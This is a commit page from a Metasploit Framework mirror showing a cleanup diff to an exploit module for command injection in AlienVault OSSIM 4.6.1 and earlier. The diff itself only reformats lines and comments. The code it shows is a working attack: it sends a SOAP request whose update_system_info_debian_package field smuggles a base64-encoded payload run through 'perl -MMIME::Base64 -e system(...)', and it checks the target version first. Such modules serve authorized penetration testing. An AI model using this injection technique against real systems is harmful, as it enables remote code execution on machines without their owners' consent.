infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land jvazquez-r7/metasploit#15, @kernelsmith's module cleanup

bug/bundler_fix
jvazquez-r7 2014-06-17 23:40:46 -05:00
parent f7b892e55b 45ea59050c
commit 8cae8d545e
No known key found for this signature in database
GPG Key ID: 38D99152B9352D83
1 changed files with 16 additions and 9 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

25
modules/exploits/linux/ids/alienvault_centerd_soap_exec.rb
View File

@ -16,11 +16,11 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info, super(update_info(info,
'Name' => 'AlienVault OSSIM av-centerd Command Injection', 'Name' => 'AlienVault OSSIM av-centerd Command Injection',
'Description' => %q{ 'Description' => %q{
This module exploits a code execution flaw in AlienVault 4.6.1 and prior. This module exploits a code execution flaw in AlienVault 4.6.1 and
The vulnerability exists in the av-centerd SOAP web service, where the prior. The vulnerability exists in the av-centerd SOAP web service,
update_system_info_debian_package method uses perl backticks in a insecure where the update_system_info_debian_package method uses perl backticks
way, allowing command injection. This module has been tested successfully in an insecure way, allowing command injection. This module has been
on AlienVault 4.6.0. tested successfully on AlienVault 4.6.0.
}, },
'Author' => 'Author' =>
[ [
@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Arch' => ARCH_CMD, 'Arch' => ARCH_CMD,
'Payload' => 'Payload' =>
{ {
#'BadChars' => "[;`$<>|]", # Don't apply because of the perl stub applied #'BadChars' => "[;`$<>|]", # Don't apply bcuz of the perl stub applied
'Compat' => { 'Compat' => {
'RequiredCmd' => 'perl netcat-e openssl python gawk' 'RequiredCmd' => 'perl netcat-e openssl python gawk'
} }
@ -66,7 +66,12 @@ class Metasploit3 < Msf::Exploit::Remote
version = "" version = ""
res = send_soap_request("get_dpkg") res = send_soap_request("get_dpkg")
if res && res.code == 200 && res.headers['SOAPServer'] && res.headers['SOAPServer'] =~ /SOAP::Lite/ && res.body.to_s =~ /alienvault-center\s*([\d\.]*)-\d/ if res &&
res.code == 200 &&
res.headers['SOAPServer'] &&
res.headers['SOAPServer'] =~ /SOAP::Lite/ &&
res.body.to_s =~ /alienvault-center\s*([\d\.]*)-\d/
version = $1 version = $1
end end
@ -107,8 +112,10 @@ class Metasploit3 < Msf::Exploit::Remote
if method == "update_system_info_debian_package" if method == "update_system_info_debian_package"
args[4] = m.add_element("c-gensym11", {'xsi:type' => 'xsd:string'}) args[4] = m.add_element("c-gensym11", {'xsi:type' => 'xsd:string'})
perl_payload = "system(decode_base64(\"#{Rex::Text.encode_base64(payload.encoded)}\"))" perl_payload = "system(decode_base64"
args[4].text = "#{rand_text_alpha(4 + rand(4))} && perl -MMIME::Base64 -e '#{perl_payload}'" perl_payload += "(\"#{Rex::Text.encode_base64(payload.encoded)}\"))"
args[4].text = "#{rand_text_alpha(4 + rand(4))}"
args[4].text += " && perl -MMIME::Base64 -e '#{perl_payload}'"
end end
xml.to_s xml.to_s